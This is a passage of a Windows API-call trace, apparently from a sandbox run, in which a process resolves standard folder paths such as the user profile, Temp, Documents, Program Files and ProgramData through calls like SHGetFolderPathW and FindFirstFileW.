lpsz="c:\\users\\5p5nrg~1\\") returned 0x12 [0049.450] SetLastError (dwErrCode=0x0) [0049.450] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0049.450] GetLastError () returned 0x0 [0049.450] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\", lpFindFileData=0x41edd0 | out: lpFindFileData=0x41edd0*(dwFileAttributes=0x41ef5c, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x135aae, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0x6c0000, nFileSizeHigh=0x40, nFileSizeLow=0x6d5370, dwReserved0=0x41ee24, dwReserved1=0x3e, cFileName="\x02", cAlternateFileName="叄m匴m2")) returned 0xffffffff [0049.451] GetLastError () returned 0x2 [0049.451] SysReAllocStringLen (in: pbstr=0x41eda4*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x41eda4*="C:\\Users\\5P5NRG~1\\") returned 1 [0049.451] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5P5NRG~1\\", psz="C:\\Users\\5P5NRG~1", len=0x11 | out: pbstr=0x41f028*="C:\\Users\\5P5NRG~1") returned 1 [0049.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1", nBufferLength=0x104, lpBuffer=0x41e8b4, lpFilePart=0x41e8b0 | out: lpBuffer="C:\\Users\\5P5NRG~1", lpFilePart=0x41e8b0*="5P5NRG~1") returned 0x11 [0049.451] SysReAllocStringLen (in: pbstr=0x41eaf4*=0x0, psz="C:", len=0x2 | out: pbstr=0x41eaf4*="C:") returned 1 [0049.451] SysReAllocStringLen (in: pbstr=0x41eab0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41eab0*="C:\\") returned 1 [0049.451] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.451] SysReAllocStringLen (in: pbstr=0x41eaac*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x41eaac*="C:\\Users\\") returned 1 [0049.451] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0049.451] SetLastError (dwErrCode=0x0) [0049.451] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0049.451] GetLastError () returned 0x0 [0049.451] FindFirstFileW (in: lpFileName="C:\\Users\\", lpFindFileData=0x41eb18 | out: lpFindFileData=0x41eb18*(dwFileAttributes=0x41eca4, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x135aae, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0x6c0000, nFileSizeHigh=0x30, nFileSizeLow=0x6dabe0, dwReserved0=0x41eb6c, dwReserved1=0x32, cFileName="\x02", cAlternateFileName="ꭄm勬m\"")) returned 0xffffffff [0049.451] GetLastError () returned 0x2 [0049.451] SysReAllocStringLen (in: pbstr=0x41eaec*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x41eaec*="C:\\Users\\") returned 1 [0049.451] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x41ed70*="C:\\Users") returned 1 [0049.451] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x41e5fc, lpFilePart=0x41e5f8 | out: lpBuffer="C:\\Users", lpFilePart=0x41e5f8*="Users") returned 0x8 [0049.452] SysReAllocStringLen (in: pbstr=0x41e83c*=0x0, psz="C:", len=0x2 | out: pbstr=0x41e83c*="C:") returned 1 [0049.452] SysReAllocStringLen (in: pbstr=0x41e7f8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41e7f8*="C:\\") returned 1 [0049.452] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.452] SysReAllocStringLen (in: pbstr=0x41e7f4*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41e7f4*="C:\\") returned 1 [0049.452] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.452] SetLastError (dwErrCode=0x0) [0049.452] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0049.452] GetLastError () returned 0x0 [0049.452] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x41e860 | out: lpFindFileData=0x41e860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41e8b4, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x6dc8d8 [0049.452] FileTimeToLocalFileTime (in: lpFileTime=0x41e874, lpLocalFileTime=0x41e7e4 | out: lpLocalFileTime=0x41e7e4) returned 1 [0049.452] FileTimeToDosDateTime (in: lpFileTime=0x41e7e4, lpFatDate=0x41e842, lpFatTime=0x41e840 | out: lpFatDate=0x41e842, lpFatTime=0x41e840) returned 1 [0049.452] FindClose (in: hFindFile=0x6dc8d8 | out: hFindFile=0x6dc8d8) returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x41ed70*="C:\\Users") returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41eae4*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x41eae4*="C:\\Users") returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x41ed70*="C:\\Users\\") returned 1 [0049.453] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1", lpFindFileData=0x41eb18 | out: lpFindFileData=0x41eb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41eb6c, dwReserved1=0x32, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6dc8d8 [0049.453] FileTimeToLocalFileTime (in: lpFileTime=0x41eb2c, lpLocalFileTime=0x41ea9c | out: lpLocalFileTime=0x41ea9c) returned 1 [0049.453] FileTimeToDosDateTime (in: lpFileTime=0x41ea9c, lpFatDate=0x41eafa, lpFatTime=0x41eaf8 | out: lpFatDate=0x41eafa, lpFatTime=0x41eaf8) returned 1 [0049.453] FindClose (in: hFindFile=0x6dc8d8 | out: hFindFile=0x6dc8d8) returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5P5NRG~1", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41ed9c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x41ed9c*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0049.453] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", len=0x1e | out: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 1 [0049.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x41edd0 | out: lpFindFileData=0x41edd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41ee24, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x6dca00 [0049.453] FileTimeToLocalFileTime (in: lpFileTime=0x41ede4, lpLocalFileTime=0x41ed54 | out: lpLocalFileTime=0x41ed54) returned 1 [0049.453] FileTimeToDosDateTime (in: lpFileTime=0x41ed54, lpFatDate=0x41edb2, lpFatTime=0x41edb0 | out: lpFatDate=0x41edb2, lpFatTime=0x41edb0) returned 1 [0049.454] FindClose (in: hFindFile=0x6dca00 | out: hFindFile=0x6dca00) returned 1 [0049.454] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0049.454] SysReAllocStringLen (in: pbstr=0x41f054*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x41f054*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0049.454] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", len=0x26 | out: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 1 [0049.454] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x41f088 | out: lpFindFileData=0x41f088*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41f0dc, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x6dca00 [0049.454] FileTimeToLocalFileTime (in: lpFileTime=0x41f09c, lpLocalFileTime=0x41f00c | out: lpLocalFileTime=0x41f00c) returned 1 [0049.454] FileTimeToDosDateTime (in: lpFileTime=0x41f00c, lpFatDate=0x41f06a, lpFatTime=0x41f068 | out: lpFatDate=0x41f06a, lpFatTime=0x41f068) returned 1 [0049.454] FindClose (in: hFindFile=0x6dca00 | out: hFindFile=0x6dca00) returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f30c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x41f30c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", len=0x2c | out: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned 1 [0049.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFindFileData=0x41f340 | out: lpFindFileData=0x41f340*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0dcfaa0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xd0dcfaa0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x6dca98 [0049.455] FileTimeToLocalFileTime (in: lpFileTime=0x41f354, lpLocalFileTime=0x41f2c4 | out: lpLocalFileTime=0x41f2c4) returned 1 [0049.455] FileTimeToDosDateTime (in: lpFileTime=0x41f2c4, lpFatDate=0x41f322, lpFatTime=0x41f320 | out: lpFatDate=0x41f322, lpFatTime=0x41f320) returned 1 [0049.455] FindClose (in: hFindFile=0x6dca98 | out: hFindFile=0x6dca98) returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f5dc*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x41f5dc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x41f6ac*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0049.455] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0049.455] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", cchLength=0x31 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 0x31 [0049.455] SysReAllocStringLen (in: pbstr=0x41f6ac*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\", len=0x31 | out: pbstr=0x41f6ac*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 1 [0049.456] SysReAllocStringLen (in: pbstr=0xae27c0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\", len=0x31 | out: pbstr=0xae27c0*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\") returned 1 [0049.456] GetWindowsDirectoryW (in: lpBuffer=0xaf1db4, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0049.456] SysReAllocStringLen (in: pbstr=0x41f69c*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x41f69c*="C:\\Windows") returned 1 [0049.456] SysReAllocStringLen (in: pbstr=0x41f6a0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x41f6a0*="C:\\Windows\\") returned 1 [0049.456] GetThreadLocale () returned 0x409 [0049.456] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.456] GetThreadLocale () returned 0x409 [0049.456] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x41f390*=0x0) returned 0xb [0049.456] SysReAllocStringLen (in: pbstr=0x41f6a0*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x41f6a0*="C:\\Windows\\") returned 1 [0049.456] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x41f5c0*="C:\\Windows\\") returned 1 [0049.456] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0049.456] SysReAllocStringLen (in: pbstr=0x41f6a0*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x41f6a0*="c:\\windows\\") returned 1 [0049.456] SysReAllocStringLen (in: pbstr=0xae27b4*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0xae27b4*="c:\\windows\\") returned 1 [0049.474] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0049.583] SysReAllocStringLen (in: pbstr=0x41f690*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", len=0x27 | out: pbstr=0x41f690*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0049.583] SysReAllocStringLen (in: pbstr=0x41f694*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x41f694*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0049.583] GetThreadLocale () returned 0x409 [0049.583] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.583] GetThreadLocale () returned 0x409 [0049.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpFilePart=0x41f390*=0x0) returned 0x28 [0049.584] SysReAllocStringLen (in: pbstr=0x41f694*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x41f694*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0049.584] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", len=0x28 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 1 [0049.584] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchLength=0x28 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 0x28 [0049.584] SysReAllocStringLen (in: pbstr=0x41f694*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\", len=0x28 | out: pbstr=0x41f694*="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 1 [0049.584] SysReAllocStringLen (in: pbstr=0xae27b0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\", len=0x28 | out: pbstr=0xae27b0*="c:\\users\\5p5nrgjn0js halpmcxz\\documents\\") returned 1 [0049.584] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0049.586] SysReAllocStringLen (in: pbstr=0x41f684*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x41f684*="C:\\Users\\Public\\Documents") returned 1 [0049.586] SysReAllocStringLen (in: pbstr=0x41f688*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x41f688*="C:\\Users\\Public\\Documents\\") returned 1 [0049.586] GetThreadLocale () returned 0x409 [0049.586] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.586] GetThreadLocale () returned 0x409 [0049.586] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.586] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x41f390*=0x0) returned 0x1a [0049.586] SysReAllocStringLen (in: pbstr=0x41f688*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x41f688*="C:\\Users\\Public\\Documents\\") returned 1 [0049.586] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x41f5c0*="C:\\Users\\Public\\Documents\\") returned 1 [0049.586] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0049.586] SysReAllocStringLen (in: pbstr=0x41f688*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x41f688*="c:\\users\\public\\documents\\") returned 1 [0049.587] SysReAllocStringLen (in: pbstr=0xae27c4*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0xae27c4*="c:\\users\\public\\documents\\") returned 1 [0049.587] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0049.589] SysReAllocStringLen (in: pbstr=0x41f678*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x41f678*="C:\\Program Files (x86)") returned 1 [0049.589] SysReAllocStringLen (in: pbstr=0x41f67c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x41f67c*="C:\\Program Files (x86)\\") returned 1 [0049.589] GetThreadLocale () returned 0x409 [0049.589] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.589] GetThreadLocale () returned 0x409 [0049.589] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.589] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x41f390*=0x0) returned 0x17 [0049.590] SysReAllocStringLen (in: pbstr=0x41f67c*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x41f67c*="C:\\Program Files (x86)\\") returned 1 [0049.590] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x41f5c0*="C:\\Program Files (x86)\\") returned 1 [0049.590] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0049.590] SysReAllocStringLen (in: pbstr=0x41f67c*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x41f67c*="c:\\program files (x86)\\") returned 1 [0049.590] SysReAllocStringLen (in: pbstr=0xae27c8*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0xae27c8*="c:\\program files (x86)\\") returned 1 [0049.590] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\ProgramData") returned 0x0 [0049.935] SysReAllocStringLen (in: pbstr=0x41f66c*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x41f66c*="C:\\ProgramData") returned 1 [0049.935] SysReAllocStringLen (in: pbstr=0x41f670*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x41f670*="C:\\ProgramData\\") returned 1 [0049.935] GetThreadLocale () returned 0x409 [0049.935] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.935] GetThreadLocale () returned 0x409 [0049.935] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.935] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x41f390*=0x0) returned 0xf [0049.935] SysReAllocStringLen (in: pbstr=0x41f670*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x41f670*="C:\\ProgramData\\") returned 1 [0049.935] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x41f5c0*="C:\\ProgramData\\") returned 1 [0049.935] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0049.935] SysReAllocStringLen (in: pbstr=0x41f670*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x41f670*="c:\\programdata\\") returned 1 [0049.935] SysReAllocStringLen (in: pbstr=0xae27cc*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0xae27cc*="c:\\programdata\\") returned 1 [0049.935] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0049.937] SysReAllocStringLen (in: pbstr=0x41f660*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x41f660*="C:\\Program Files (x86)\\Common Files") returned 1 [0049.937] SysReAllocStringLen (in: pbstr=0x41f664*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x41f664*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0049.937] GetThreadLocale () returned 0x409 [0049.937] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.937] GetThreadLocale () returned 0x409 [0049.937] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.937] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x41f390*=0x0) returned 0x24 [0049.937] SysReAllocStringLen (in: pbstr=0x41f664*="C:\\Program Files (x86)\\Common Files\\", psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x41f664*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0049.937] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x41f5c0*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0049.937] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files\\", cchLength=0x24 | out: lpsz="c:\\program files (x86)\\common files\\") returned 0x24 [0049.937] SysReAllocStringLen (in: pbstr=0x41f664*="C:\\Program Files (x86)\\Common Files\\", psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0x41f664*="c:\\program files (x86)\\common files\\") returned 1 [0049.937] SysReAllocStringLen (in: pbstr=0xae27d0*=0x0, psz="c:\\program files (x86)\\common files\\", len=0x24 | out: pbstr=0xae27d0*="c:\\program files (x86)\\common files\\") returned 1 [0049.937] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x0 [0049.939] SysReAllocStringLen (in: pbstr=0x41f654*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", len=0x26 | out: pbstr=0x41f654*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 1 [0049.939] 